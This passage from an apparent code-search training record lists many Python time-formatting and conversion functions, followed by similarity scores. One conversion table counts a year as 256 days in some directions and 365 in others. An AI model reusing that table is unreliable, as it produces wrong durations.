\"time / 14\",\n \"years\": \"time / 365\",\n \"decades\": \"time / 365 / 10\",\n \"centuries\": \"time / 365 / 100\",\n \"millenniums\": \"time / 365 / 1000\"\n },\n \"weeks\": {\n \"milliseconds\": \"time * 7 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 7 * 24 * 60 * 60\",\n \"minutes\": \"time * 7 * 24 * 60\",\n \"hours\": \"time * 7 * 24\",\n \"days\": \"time * 7\",\n \"weeks\": \"time\",\n \"fortnights\": \"time / 2\",\n \"years\": \"time / 52\",\n \"decades\": \"time / 52 / 10\",\n \"centuries\": \"time / 52 / 100\",\n \"millenniums\": \"time / 52 / 1000\"\n },\n \"fortnights\": {\n \"milliseconds\": \"time * 14 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 14 * 24 * 60 * 60\",\n \"minutes\": \"time * 14 * 24 * 60\",\n \"hours\": \"time * 14 * 24\",\n \"days\": \"time * 14\",\n \"weeks\": \"time * 2\",\n \"fortnights\": \"time\",\n \"years\": \"time / 26\",\n \"decades\": \"time / 26 / 10\",\n \"centuries\": \"time / 26 / 100\",\n \"millenniums\": \"time / 26 / 1000\"\n },\n \"years\": {\n \"milliseconds\": \"time * 256 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 256 * 24 * 60 * 60\",\n \"minutes\": \"time * 256 * 24 * 60\",\n \"hours\": \"time * 256 * 24\",\n \"days\": \"time * 256\",\n \"weeks\": \"time * 52\",\n \"fortnights\": \"time * 26\",\n \"years\": \"time\",\n \"decades\": \"time / 10\",\n \"centuries\": \"time / 100\",\n \"millenniums\": \"time / 1000\"\n },\n \"decades\": {\n \"milliseconds\": \"time * 10 * 256 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 10 * 256 * 24 * 60 * 60\",\n \"minutes\": \"time * 10 * 256 * 24 * 60\",\n \"hours\": \"time * 10 * 256 * 24\",\n \"days\": \"time * 10 * 256\",\n \"weeks\": \"time * 10 * 52\",\n \"fortnights\": \"time * 10 * 26\",\n \"years\": \"time * 10\",\n \"decades\": \"time\",\n \"centuries\": \"time / 10\",\n \"millenniums\": \"time / 100\"\n },\n \"centuries\": {\n \"milliseconds\": \"time * 100 * 256 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 100 * 256 * 24 * 60 * 60\",\n \"minutes\": \"time * 100 * 256 * 24 * 60\",\n \"hours\": \"time * 100 * 256 * 24\",\n \"days\": \"time * 100 * 256\",\n \"weeks\": \"time * 100 * 52\",\n \"fortnights\": \"time * 100 * 26\",\n \"years\": \"time * 100\",\n \"decades\": \"time * 10\",\n \"centuries\": \"time\",\n \"millenniums\": \"time / 10\"\n },\n \"millenniums\": {\n \"milliseconds\": \"time * 1000 * 256 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 1000 * 256 * 24 * 60 * 60\",\n \"minutes\": \"time * 1000 * 256 * 24 * 60\",\n \"hours\": \"time * 1000 * 256 * 24\",\n \"days\": \"time * 1000 * 256\",\n \"weeks\": \"time * 1000 * 52\",\n \"fortnights\": \"time * 1000 * 26\",\n \"years\": \"time * 1000\",\n \"decades\": \"time * 100\",\n \"centuries\": \"time * 10\",\n \"millenniums\": \"time\"\n }\n }\n\n # Return evaluated value\n return eval(conversions[currentformat][newformat])", "def get_time_string(time):\r\n mins = time // 60\r\n secs = time % 60\r\n time_string = ''\r\n\r\n if mins < 10:\r\n time_string += ' '\r\n elif mins < 100:\r\n time_string += ' '\r\n\r\n time_string += '%dm ' % mins\r\n\r\n if secs < 10:\r\n time_string += ' '\r\n\r\n time_string += '%ds' % secs\r\n\r\n return time_string", "def change_datetime_format(the_datetime):\n\n year = int(the_datetime[:4])\n month = int(the_datetime[5:7])\n day = int(the_datetime[8:10])\n try:\n hour = int(the_datetime[11:13])\n minutes = int(the_datetime[14:16])\n seconds = int(the_datetime[17:19])\n except ValueError:\n hour = 9\n minutes = 0\n seconds = 0\n the_datetime = datetime(year, month, day, hour, 
minutes, seconds)\n\n return the_datetime", "def format_date(time=False):\n\n return arrow.get(time).format('DD-MM-YYYY')", "def time_string(time_f: float) -> str:\n m, s = divmod(time_f, 60)\n h, m = divmod(m, 60)\n\n if h < 1:\n if m < 1 and s < 1:\n msec = int(s * 1000)\n return '{:=03d}msec'.format(msec)\n\n if m < 1:\n return '{:=02.0f}sec'.format(s)\n\n return '{:=02.0f}min:{:=02.0f}sec'.format(m, s)\n else:\n return '{:=01.0f}h:{:=02.0f}min:{:=02.0f}sec'.format(h, m, s)", "def formatDate(value):\n return time.strftime('%c',time.localtime(value))", "def timestr():\n return dt.strftime(dt.now(),'%H:%M:%S')", "def format_time(seconds: float) -> str:\n # return str(timedelta(seconds=seconds))[2:10] if seconds != 0.0 else \"00:00.00\"\n if seconds == 0.0:\n return \"00.00\"\n elif seconds < 60.0:\n return str(timedelta(seconds=seconds))[5:10] # SS:DD, d decimal\n else:\n return str(timedelta(seconds=seconds))[2:7] # MM:SS", "def format_time(self, created):\n return time.strftime(\n '%Y-%m-%d %H:%M:%S',\n time.localtime(created)\n )", "def get_time() -> str:\n return strftime(\"%H:%M:%S\")", "def _serialize_time(val):\n return val.isoformat()", "def nersc_format_datetime(timetup=None):\n if timetup is None:\n timetup = time.localtime()\n # YYYY-MM-DD[THH:MM[:SS]]\n return time.strftime('%Y-%m-%dT%H:%M:%S', timetup)", "def format_time(tm, tz):\n\tif not tz:\n\t\t# Without a timezone, all we can do is say \"in X seconds\"\n\t\ttm -= int(time.time())\n\t\tif tm < 60: return \"in %d seconds\" % tm\n\t\treturn \"in %d:%02d\" % (tm // 60, tm % 60)\n\ttm = datetime.datetime.fromtimestamp(tm, tz=pytz.timezone(tz))\n\treturn tm.strftime(\"at %H:%M\")", "def format_date(date, time_format=\"23:59:59Z\"):\n date_format = \"%Y-%m-%dT{time}\".format(time=time_format)\n return date.strftime(date_format)", "def time_form(gdf):\n gdf['time'] = gdf['time'].dt.strftime(\"%Y-%m-%dT%H:%M:%S\")\n \n return gdf", "def get_time_string(self):\n return f\"{self.year} {self.month:02} \" \\\n f\"{self.start_day:02} {self.start_hour:02} 00 {self.get_duration():6}\"", "def convertTime(self, sec):\n\n if self.timeFormat == S:\n return '%.3f' % sec\n\n if self.timeFormat == HHMMSS:\n return seconds2time(sec)", "def format_book_time(dt):\n return datetime.strftime(dt, \"%Y-%m-%dT%H:%M:%S%z\")", "def task11_time_converter(num):\n if num < 0:\n raise ValueError\n hour = num // 60\n minute = num % 60\n return f'{hour}:{minute}'", "def unixTimeToString_NEW(ut):\n intTime = int(ut)\n frac = ut - intTime\n #print \"\\nfrac is %f, conv is %f\" % (frac, round(frac*1000))\n y, m, d, ho, mi, se, junk1, junk2, junk3 = gmtime(intTime)\n #print \"ut is %f, s is %4d_%02d_%02d_%02d_%02d_%02d.%03d\\n\" % (ut, y, m, d, ho, mi, se, int(frac*1000))\n #return '%4d_%02d_%02d_%02d_%02d_%02d.%03d' % (y, m, d, ho, mi, se, int(frac*1000))\n return '%4d_%02d_%02d_%02d_%02d_%02d.%03d' % (y, m, d, ho, mi, se, round(frac*1000))", "def timestamp(formatting=\"%Y%m%d_%H%M%S\"):\n now = datetime.now()\n return now.strftime(formatting)", "def convert_time(min, sec):\n # Updated 11/19/16 \n total_time = min*60\n total_time = total_time + sec\n \n return str(total_time)+'.0' # string because being passed to GUI", "def timeConversion(s):\n new_s = ''\n if s[-2:] == 'PM' and s[:2] != '12':\n new_s = str(int(s[:2]) + 12) + s[2:-2]\n elif s[-2:] == 'AM' and s[:2] == '12':\n new_s = '0' + str(int(s[:2]) - 12) + s[2:-2]\n else:\n new_s = s[:-2]\n return new_s", "def format_timestamp(value, format='matchtime'):\n if format == 'matchtime':\n # yyyy mm dd hh mm 
ss\n value = value.split('.')\n return \"{} {} {}:{}\".format(calendar.month_name[int(value[1])], int(value[2]), int(value[3]), value[4])\n elif format == 'shortmatchtime':\n value = value.split('.')\n return \"{}/{} {}:{}\".format(int(value[1]), int(value[2]), int(value[3]), value[4])\n elif format == 'hhmm': # datetime hour/min\n value = value.split('.')\n return \"{}:{}\".format(value[4], value[5])", "def get_formatted_time() -> datetime.strftime:\n\t\n\tnow = datetime.now() # time now\n\thalf_hour = (now - timedelta(minutes = 30)) # time 30 min ago\n\t# returns half hour ago to accommodate for failed checks\n\t# (bc twint behaves as if none found if check failed)\n\tcurrent_time = half_hour.strftime(\"%Y-%m-%d %H:%M:%S\")\n\treturn current_time", "def _ToBlogTime(self, time_tuple):\r\n return time.strftime('%Y-%m-%dT%H:%M:%SZ', time_tuple)", "def test_format_date_time(self):\r\n formatted_date = date_formatter.format_date_time(\"190501:0902\")\r\n self.assertEqual(formatted_date, \"2019-05-01 09:02\")", "def format_datetime(date_time):\n return date_time.strftime(\"%Y-%m-%d %H:%M:%S\")", "def conv_time(stamp):\n value = datetime.fromtimestamp(stamp)\n return value.strftime('%Y-%m-%d %H:%M:%S')", "def format(time_in_seconds):\n \"\"\" in tenths of seconds into formatted string A:BC.D \"\"\"\n # A ten of minutes \n A = time_in_seconds // 600\n Intermediate_Operation = time_in_seconds // 10\n amount_of_seconds = Intermediate_Operation %60\n # B Unity of minutes\n B = amount_of_seconds // 10\n # C ten of seconds\n C = amount_of_seconds % 10\n # D unity of seconds\n D = time_in_seconds % 10\n return str(A)+\":\"+str(B)+str(C)+\".\"+str(D)", "def timestamp2str(t, fmt='%Y-%m-%d %H:%M:%S.000'):\n return datetime.fromtimestamp(t).strftime(fmt)", "def timestamp2str(t, fmt='%Y-%m-%d %H:%M:%S.000'):\n return datetime.fromtimestamp(t).strftime(fmt)", "def adjust_date_format(date, format_in, format_out):\n return datetime.strptime(date, format_in).strftime(format_out)", "def get_time():\n return time.strftime(\"%Y%m%d-%H%M%S\")", "def time():\n return datetime.datetime.now().strftime(\"%Y%m%dT%H%M%SZ\")", "def get_time():\r\n return datetime.datetime.now().strftime(\"%H\")+\":\"+datetime.datetime.now().strftime(\"%M\")+\":\"+datetime.datetime.now().strftime(\"%S\")", "def format_datetime(dt):\r\n return dateformat.format(make_naive(dt), 'r')", "def time_to_string(value):\n if value == gst.CLOCK_TIME_NONE:\n return \"--:--:--.---\"\n ms = value / gst.MSECOND\n sec = ms / 1000\n ms = ms % 1000\n mins = sec / 60\n sec = sec % 60\n hours = mins / 60\n mins = mins % 60\n return \"%02d:%02d:%02d.%03d\" % (hours, mins, sec, ms)" ]
[ "0.7315664", "0.72966367", "0.7183788", "0.7177541", "0.71764636", "0.7169046", "0.7167851", "0.7160244", "0.7139336", "0.7091297", "0.7036572", "0.70216924", "0.6875871", "0.6864549", "0.6824766", "0.6812519", "0.68091184", "0.680905", "0.68039894", "0.67950267", "0.6790418", "0.676419", "0.67641133", "0.6755373", "0.67547417", "0.6725895", "0.6721467", "0.67204535", "0.671611", "0.6695589", "0.6690256", "0.6679656", "0.6677038", "0.6674396", "0.6639681", "0.6625929", "0.6622003", "0.6603827", "0.65885127", "0.65857303", "0.65749174", "0.65630966", "0.65569395", "0.65499437", "0.65350187", "0.6534129", "0.6530745", "0.6530556", "0.6521405", "0.65118337", "0.65050876", "0.64973265", "0.64448005", "0.64362466", "0.641882", "0.6412176", "0.64079565", "0.640563", "0.6392265", "0.6387613", "0.6383741", "0.6375347", "0.6373687", "0.63716733", "0.63621426", "0.63577104", "0.6353923", "0.63529843", "0.63371915", "0.63244784", "0.6314492", "0.63117874", "0.63081634", "0.63062733", "0.6300332", "0.62819505", "0.62784725", "0.6274055", "0.6252027", "0.6245025", "0.6242962", "0.6240084", "0.62338376", "0.62120914", "0.620768", "0.62039536", "0.61831194", "0.6154696", "0.61521727", "0.615051", "0.6144817", "0.6139167", "0.612504", "0.61184657", "0.61184657", "0.6113881", "0.61094934", "0.61025923", "0.6101506", "0.6099635", "0.60984576" ]
0.0
-1
Function that saves the return_list from make_time to a file called yt_vids.txt. Optional, default False.
def save_link_time(return_list, path_to_download):
    # Opens a new file and writes lines to it and saves it at the spot provided
    with open(os.path.join(path_to_download, "yt_vids.txt"), "w") as w:
        w.write('\n'.join('{} {} {}'.format(x[0], x[1][0], x[1][1]) for x in return_list))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_save_list_to_file(self):\n task_list = TaskList()\n task1 = Task()\n output_file_path = self.testing_files[0]\n task1.set_name('Test Task One')\n task1.set_minutes(30)\n task1.set_notes('This is a great test task')\n task_list.add_task(task1)\n\n self.assert_equal(True, task_list.save_to_file(output_file_path))\n self.assert_equal(True, os.path.isfile(output_file_path))", "def save_file():\n generic = pull_list()\n result = list()\n i = 0\n while True:\n try:\n if generic[i].startswith('CVE'):\n cve_pattern = \"^CVE-\\d+-\\d+|^CVE-\\d+-[X]+\"\n header = re.findall(cve_pattern, generic[i])[0]\n i += 1\n notes = list()\n while not generic[i].startswith('CVE'):\n commit_pattern = \"http[s]?:\\/\\/.+commit\\/[\\S]+\"\n if re.search(commit_pattern, generic[i]):\n link = re.findall(commit_pattern, generic[i])\n notes.append(link[0])\n i += 1\n if notes != list():\n result.append(Data(header, notes))\n except IndexError:\n print('Finished')\n break\n return result", "def output_to_file(utilist, filepath=\"demo.csv\"):\n os.makedirs(os.path.dirname(filepath), exist_ok=True)\n with open(filepath, \"a\") as f:\n f.write(utilist + \"\\n\")", "def outList(self,list=False):\n txt = ''\n txt += 'echo \">>> list of expected files on output sandbox\"\\n'\n listOutFiles = []\n stdout = 'CMSSW_$NJob.stdout'\n stderr = 'CMSSW_$NJob.stderr'\n if len(self.output_file) <= 0:\n msg =\"WARNING: no output files name have been defined!!\\n\"\n msg+=\"\\tno output files will be reported back/staged\\n\"\n common.logger.info(msg)\n\n if (self.return_data == 1):\n for file in (self.output_file):\n listOutFiles.append(numberFile(file, '$OutUniqueID'))\n for file in (self.output_file_sandbox):\n listOutFiles.append(numberFile(file, '$NJob'))\n listOutFiles.append(stdout)\n listOutFiles.append(stderr)\n listOutFiles.append('Watchdog_$NJob.log.gz')\n\n txt += 'echo \"output files: '+string.join(listOutFiles,' ')+'\"\\n'\n txt += 'filesToCheck=\"'+string.join(listOutFiles,' ')+'\"\\n'\n txt += 'export filesToCheck\\n'\n taskinfo={}\n taskinfo['outfileBasename'] = self.output_file\n common._db.updateTask_(taskinfo)\n\n if list : return self.output_file\n return txt", "def export_time(z, name, save):\r\n list_dicts = []\r\n csv_columns = [\"initial size\", \"embed algo\", \"regression\", \"time\"]\r\n csv_file = os.path.join(\"..\", save, \"{} times_1.csv\".format(name))\r\n keys = list(z.keys())\r\n for key in keys:\r\n if \" + \" in key:\r\n se = z[key]\r\n initial_method = se.initial_method\r\n method = se.embedding_method\r\n for j in range(len(se.list_dicts_embedding)):\r\n data_results = {\"initial size\": se.initial_size[j], \"embed algo\": initial_method, \"regression\": method,\r\n \"time\": se.times[j]}\r\n list_dicts.append(data_results)\r\n else:\r\n data_results = {\"initial size\": \"\", \"embed algo\": key, \"regression\": \"\", \"time\": z[key][2]}\r\n list_dicts.append(data_results)\r\n with open(csv_file, 'w') as csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\r\n writer.writeheader()\r\n for data in list_dicts:\r\n writer.writerow(data)", "def write_list_file(output_file, clip_list_arr):\n list_file = output_file+'_clip_list.txt'\n print \"list_file: \", list_file\n f = open(list_file, 'w')\n for clip in clip_list_arr:\n line = 'file '+clip\n f.write(\"%s\\n\" % line)\n # Add in a divider movie between clips? 
(it could go here)\n f.close()\n # print 'list_file', list_file\n # print clip_list_arr\n\n return list_file", "def write(cls, vas):\n with open(Y, 'w') as f_i:\n for items in vas:\n f_i.write('%s ' % items)\n print(\"File written successfully. Check out \\\"output.txt\\\" file\")\n f_i.close()", "def write_to_file(self):\n name = datetime.today().date()\n with open(f'{name}.csv', 'w', newline='') as file_create:\n fieldnames = ['date', 'value_in_pln']\n writer = csv.DictWriter(file_create, fieldnames=fieldnames)\n writer.writeheader()\n while datetime.today() < self.track_to:\n value_of_currency = PriceTracker.track_price()\n with open(f'{file_create.name}', 'a', newline='') as file_append:\n fieldnames = ['date', 'value_in_pln']\n writer = csv.DictWriter(file_append, fieldnames=fieldnames)\n writer.writerow({'date': datetime.today().strftime(\"%H:%M:%S\"), 'value_in_pln': value_of_currency})\n\n self.check_min_value(tracked_price=value_of_currency)\n sleep(1)\n\n return self.generate_report(file_create.name)", "def write_list_to_file(ls, save_path):\n # Open in appendation mode given that this function may be called multiple\n # times on the same file (positive and negative sentiment are in separate\n # directories).\n out_file = open(save_path, \"w+\")\n for example in ls:\n out_file.write(example)\n out_file.write('\\n')", "def _save_tracker_output(seq: Sequence, tracker: Tracker, output: dict):\n\n if not os.path.exists(tracker.results_dir):\n print(\"create tracking result dir:\", tracker.results_dir)\n os.makedirs(tracker.results_dir)\n if seq.dataset in ['trackingnet', 'got10k']:\n if not os.path.exists(os.path.join(tracker.results_dir, seq.dataset)):\n os.makedirs(os.path.join(tracker.results_dir, seq.dataset))\n '''2021.1.5 create new folder for these two datasets'''\n if seq.dataset in ['trackingnet', 'got10k']:\n base_results_path = os.path.join(tracker.results_dir, seq.dataset, seq.name)\n else:\n base_results_path = os.path.join(tracker.results_dir, seq.name)\n\n def save_bb(file, data):\n tracked_bb = np.array(data).astype(int)\n np.savetxt(file, tracked_bb, delimiter='\\t', fmt='%d')\n\n def save_time(file, data):\n exec_times = np.array(data).astype(float)\n np.savetxt(file, exec_times, delimiter='\\t', fmt='%f')\n\n def save_score(file, data):\n scores = np.array(data).astype(float)\n np.savetxt(file, scores, delimiter='\\t', fmt='%.2f')\n\n def _convert_dict(input_dict):\n data_dict = {}\n for elem in input_dict:\n for k, v in elem.items():\n if k in data_dict.keys():\n data_dict[k].append(v)\n else:\n data_dict[k] = [v, ]\n return data_dict\n\n for key, data in output.items():\n # If data is empty\n if not data:\n continue\n\n if key == 'target_bbox':\n if isinstance(data[0], (dict, OrderedDict)):\n data_dict = _convert_dict(data)\n\n for obj_id, d in data_dict.items():\n bbox_file = '{}_{}.txt'.format(base_results_path, obj_id)\n save_bb(bbox_file, d)\n else:\n # Single-object mode\n bbox_file = '{}.txt'.format(base_results_path)\n save_bb(bbox_file, data)\n\n if key == 'all_boxes':\n if isinstance(data[0], (dict, OrderedDict)):\n data_dict = _convert_dict(data)\n\n for obj_id, d in data_dict.items():\n bbox_file = '{}_{}_all_boxes.txt'.format(base_results_path, obj_id)\n save_bb(bbox_file, d)\n else:\n # Single-object mode\n bbox_file = '{}_all_boxes.txt'.format(base_results_path)\n save_bb(bbox_file, data)\n\n if key == 'all_scores':\n if isinstance(data[0], (dict, OrderedDict)):\n data_dict = _convert_dict(data)\n\n for obj_id, d in data_dict.items():\n bbox_file = 
'{}_{}_all_scores.txt'.format(base_results_path, obj_id)\n save_score(bbox_file, d)\n else:\n # Single-object mode\n print(\"saving scores...\")\n bbox_file = '{}_all_scores.txt'.format(base_results_path)\n save_score(bbox_file, data)\n\n elif key == 'time':\n if isinstance(data[0], dict):\n data_dict = _convert_dict(data)\n\n for obj_id, d in data_dict.items():\n timings_file = '{}_{}_time.txt'.format(base_results_path, obj_id)\n save_time(timings_file, d)\n else:\n timings_file = '{}_time.txt'.format(base_results_path)\n save_time(timings_file, data)", "def save_list(todo_list, save_location):\r\n data_file_w = open(save_location,\r\n \"w\") # open the save file and clear the data from it\r\n data_file_w.write(\"Warning: The Todo-List Program will not be able to \"\r\n \"load this save file if it is incorrectly modified. \"\r\n \"Modify at your own risk. The structure is Entry \"\r\n \"Text, Entry Priority as a number, Entry Group as a \"\r\n \"number (Not Yet Utilized, but necessary), and Entry \"\r\n \"Visibility as a boolean, each on a separate line, a \"\r\n \"single line gap in between, and the \"\r\n \"very first line is skipped\\n\")\r\n for item in todo_list:\r\n data_file_w.write(\"{0}\\n{1}\\n{2}\\n{3}\\n\\n\".format(item.text,\r\n str(item.priority),\r\n str(item.group),\r\n str(item.visible)))\r\n data_file_w.close()\r\n return", "def save_time_spent(self):\n\n ratings_dir = Path(self.out_dir).resolve() / cfg.suffix_ratings_dir\n if not ratings_dir.exists():\n makedirs(ratings_dir, exist_ok=True)\n\n timer_file = ratings_dir / '{}_{}_{}'.format(\n self.vis_type, self.suffix, cfg.file_name_timer)\n\n lines = '\\n'.join(['{},{}'.format(sid, elapsed_time)\n for sid, elapsed_time in self.timer.items()])\n\n # saving to disk\n try:\n with open(timer_file, 'w') as tf:\n tf.write(lines)\n except:\n print('Unable to save timer info to disk -- printing them to log:')\n print(lines)\n raise IOError('Error in saving timer info to file!')\n\n # printing summary\n times = np.array(list(self.timer.values()))\n if len(times) < 10:\n print('\\n\\ntimes spent per subject in seconds:\\n{}'.format(lines))\n\n print('\\nMedian time per subject : {} seconds'.format(np.median(times)))\n print('\\t5th and 95th percentile of distribution of times spent '\n ': {} seconds'.format(np.nanpercentile(times, [5, 95])))", "def writeRawFCD():\n global vehId, vehIdDict\n vehIdDict = {}\n vehId = 0\n day = 0\n\n def getVehId(orgId):\n \"\"\"creates new vehicle id's which consists only numerics\"\"\"\n global vehId, vehIdDict\n value = vehIdDict.get(orgId, vehId)\n if value is vehId:\n vehIdDict[orgId] = vehId\n vehId = (vehId + 1) % 65500\n return value\n\n outputFile = open(path.FQrawFCD, 'w')\n\n for period, quota, vtypeDictR, taxiSum in generatePeriodQuotaSets():\n day += 86400\n # reset dict so that every taxi (even if the vehicle is chosen several\n # times) gets its own id\n vehIdDict = {}\n # dataset=0\n sortedKeys = vtypeDictR.keys()\n sortedKeys.sort()\n for timestep in sortedKeys:\n taxiList = vtypeDictR[timestep]\n for tup in taxiList: # all elements in this timestep\n # calc timestep ->for every period /quota set a new day\n time = timestep + day\n time = calcTime.getDateFromDepart(time)\n # dataset+=1\n # print ouptut\n # veh_id date (time to simDate+time) x (remove and\n # set comma new)\n outputFile.write(str(getVehId(tup[0])) + '\\t' + time + '\\t' + tup[3][0:2] + '.' + tup[3][2:7] + tup[3][8:] +\n # y (remove and set comma new)\n # status speed form m/s in km/h\n '\\t' + tup[4][0:2] + '.' 
+ tup[4][2:7] + tup[4][8:] + '\\t' + \"90\" + '\\t' + str(int(round(tup[2] * 3.6))) + '\\n')\n # print dataset, time\n print(vehId)\n outputFile.close()", "def create_checkfile(artist_list):\n with open(\"checkfile4.txt\", 'w') as checkfile: # we are creating new file named checkfile, hence method r for write\n for new_artist in artist_list:\n for new_album in new_artist.albums:\n for new_song in new_album.tracks: # NOTE: we change below from 2.name back to 2.title\n print(\"{0.name}\\t{1.name}\\t{1.year}\\t{2.title}\".format(new_artist, new_album, new_song),\n file=checkfile)\n\n # NOTE: python 2 does not allow print above where you have {0.name} etc\n # To run this pring format in python 2, you need to import print_function at the top of code using:\n # from __future__ import print_function", "def dump_to_file(final_results):\n\t#Add prefix result\n\tif final_results[\"Results\"][\"Test passed\"] == True:\n\t\ttime_now = time.time()\n\t\touput_filepath = checklists_filepath.replace(\".json\", \"\", 1) + \"_\" + datetime.datetime.fromtimestamp(time_now).strftime('%Y-%m-%d_%Hh%Mm%Ss') + \"_PASSED.json\"\n\telse:\n\t\ttime_now = time.time()\n\t\touput_filepath = checklists_filepath.replace(\".json\", \"\", 1) + \"_\" + datetime.datetime.fromtimestamp(time_now).strftime('%Y-%m-%d_%Hh%Mm%Ss') + \"_FAILED.json\"\n\twith open(ouput_filepath, 'w') as fp:\n\t\tjson.dump(final_results, fp)\n\treturn ouput_filepath", "def outw():\n # make the record string\n # ok, pack em up...\n outstr = \"\".join(outlist)\n print(outstr)\n print(len(outstr))\n # of = open(\"workfile\", \"w\")\n of = open(\"workfile\", \"a\")\n # of.write(\\n)\n of.write(outstr)\n of.close()", "def save_list_to_file(the_list, filepath):\n with open(filepath, 'w') as file_handler:\n for item in the_list:\n file_handler.write(\"{}\\n\".format(item))", "def write_vote_ids():\r\n\r\n open_file = open(os.path.join('data', 'vote_ids.txt'), 'w')\r\n open_file.write(\"\\n\".join(vote_set))", "def save(self, filename, format = \"text\"):\n #\n for time in self.mdvtc.keys():\n if format == \"csv\":\n save_filename = filename + str(int(time)) + \".csv\"\n elif format == \"text\":\n save_filename = filename + str(int(time)) + \".txt\"\n else:\n save_filename = filename + str(int(time)) + \".txt\"\n self.mdvtc[time].save(save_filename, format)", "def save_current_run_time():\n # path = \"/Users/szou/Downloads/bu/happydogs/analytics_happydogs/last_time_run\" # hard coding this due to CRON, but will remove later\n output_file = open(\"last_time_run\", \"w\")\n current_time_string = datetime.datetime.strftime(\n datetime.datetime.now(), \"%Y-%m-%d %H:%M:%S\"\n )\n output_file.write(current_time_string)\n print(current_time_string)\n output_file.close()", "def writeout(self):\n out_file = ''.join(['theta_w_t', str(self.t), '.dat'])\n data_list = [] \n\n for i in xrange(self.n_params): \n data_list.append( self.theta_t[i,:] ) \n\n data_list.append(self.w_t)\n\n np.savetxt(\n out_file, \n (np.vstack(np.array(data_list))).T, \n delimiter='\\t'\n )\n\n return None", "def write_the_contents_to_the_same_file(self):\n if not len(self.student_list):\n print('There is no contents to write')\n return\n\n if self._filename is None:\n self._filename = self.input_filename()\n\n with open(self._filename, 'w') as OUT:\n OUT.write(self.student_list.to_csv(date_format='%Y-%m-%d',\n sep='\\t', header=False, columns=self.columns_to_save))\n print(f'Data are saved into {self._filename!r}')", "def save_to_csv(list_return, name, fieldnames):\n 
os.makedirs(os.path.dirname(name + '.csv'), exist_ok=True)\n with open(name + '.csv', 'w') as csvfile:\n csvfile.write(','.join(map(str, field_names)))\n csvfile.write('\\n')\n write = csv.writer(csvfile, delimiter=',')\n for x in range(0, len(list_return)):\n write.writerow(list_return[x])", "def main():\n parser = argparse.ArgumentParser(description='Saves MtGox trades for a time period')\n parser.add_argument('-s','--start', help='The start date in ' + input_dateformat + 'format', required=True)\n parser.add_argument('-e','--end', help='The end date'+ input_dateformat + 'format', required=True)\n args = vars(parser.parse_args())\n start=get_unixtime(args['start'], input_dateformat)\n end=get_unixtime(args['end'], input_dateformat)\n if end < start:\n print \"End timestamp must be later than start timestamp. Exiting\"\n sys.exit()\n print \"Will get trades from \", start, \"to\", end\n\n \"\"\" read the output file and adjust the start date, if it exists\n \"\"\"\n try:\n with open(outfile_name, \"r\") as in_file:\n goxdata = in_file.readlines() \n saved_start=get_unixtime(goxdata[0].split(\",\")[0], input_dateformat)\n saved_end=get_unixtime(goxdata[len(goxdata)-1].split(\",\")[0], input_dateformat)\n\n print \"File found, with start date:\", saved_start, \"and end date\", saved_end\n if start < saved_end:\n print \"Adjusted start time from \", start, \"to \", saved_end\n start = saved_end\n except IOError:\n print \"Output file not found. Will create a new one.\"\n\n \"\"\" get data from MtGox in chunks\n \"\"\"\n try:\n currstart = start\n endreached = False\n while endreached == False:\n # populate the trades dictionary with the next batch of data\n data = fetch_data(currstart)\n print \"Fetching data\", currstart\n if (data == '[]'):\n break \n trades = [mtgox_trade(a) for a in json.loads(data)]\n currstart = trades[-1].timestamp\n\n if trades[-1].timestamp > end:\n endreached = True\n\n # place trades into the out_file before getting the next batch from MtGox \n # so that if the program gets interrupt you have saved the trades obtained so far\n with open(outfile_name, \"a\") as out_file:\n for item in trades:\n # when you request data from a timestamp gox truncates your start time to seconds and then\n # send you everything including the initial second. 
So you must filter here trades\n # of the start_time second that are already in the database.\n if item.timestamp > start and item.timestamp < end:\n out_file.write(item.trade_to_string()+\"\\n\")\n\n except urllib2.HTTPError, e:\n print \"Error:\", str(e.code), str(e.reason)\n return\n except urllib2.URLError, e:\n print \"Error:\", e\n return", "def make_time_stamp_file():\n with open(TIME_STAMP_FILE_NAME, 'w') as f:\n f.write(datetime.datetime.now().strftime('%m/%d/%Y %I:%M%p'))", "def create_checkfile(artist_list):\n\n print(\"Creating checkfile...\")\n\n with open(\"checkfile.txt\", \"w\") as checkfile:\n\n for artist in artist_list:\n print(artist.name)\n for album in artist.albums:\n print(\"\\t\", album.name, album.year)\n for song in album.tracks:\n print(\"\\t\\t\", song.title)\n print(f\"{artist.name}\\t{album.name}\\t{album.year}\\t{song.title}\", file=checkfile)\n\n print(\"Checkfile created.\")\n print()\n print(\"=\" * 40)\n print()", "def save_output(output_list):\n wb = Workbook()\n ws1 = wb.active\n ws1.title = 'Sheet1'\n # Create title for columns\n columns_titles = ['Name', 'Condition description', 'birad[0]','birad[1]','birad[2]','birad[3]','birad[4]','birad[5]','birad[6]','Relevant modalities',\n 'Relevant findings', 'Unique findings','Additional info',\n 'Parameters', 50, 30, 10, 5, 1,'Pathogenomonic', 'Negative',\n 'Ignore', 'Associated conditions', 'Differential diagnosis', 'Notes']\n ws1.append(columns_titles)\n # Create list for output file\n for ol in output_list:\n for o in ol:\n cr_list = create_list(o)\n ws1.append(cr_list)\n wb.save(filename=OUTPUT_FILE)", "def write_results_dat(self, output_path):\n\n def fstr(nb):\n data = '%E' % nb\n if data == 'NAN':\n nb, power = 0,0\n else:\n nb, power = data.split('E')\n nb = float(nb) /10\n power = int(power) + 1\n return '%.5fE%+03i' %(nb,power)\n\n line = '%s %s %s %i %i %i %i %s %s %s %s %s %i\\n' % (fstr(self.axsec), fstr(self.xerru), \n fstr(self.xerrc), self.nevents, self.nw, self.maxit, self.nunwgt,\n fstr(self.luminosity), fstr(self.wgt), fstr(self.xsec), fstr(self.maxwgt),\n fstr(self.th_maxwgt), self.th_nunwgt) \n fsock = open(output_path,'w') \n fsock.writelines(line)\n for i in range(len(self.ysec_iter)):\n line = '%s %s %s %s %s %s\\n' % (i+1, self.ysec_iter[i], self.yerr_iter[i], \n self.eff_iter[i], self.maxwgt_iter[i], self.yasec_iter[i]) \n fsock.writelines(line)", "def write_to_file_y(path):\n path1 = path + \"/y_Macros\"\n if not os.path.exists(path1):\n os.mkdir(path1)\n for e in 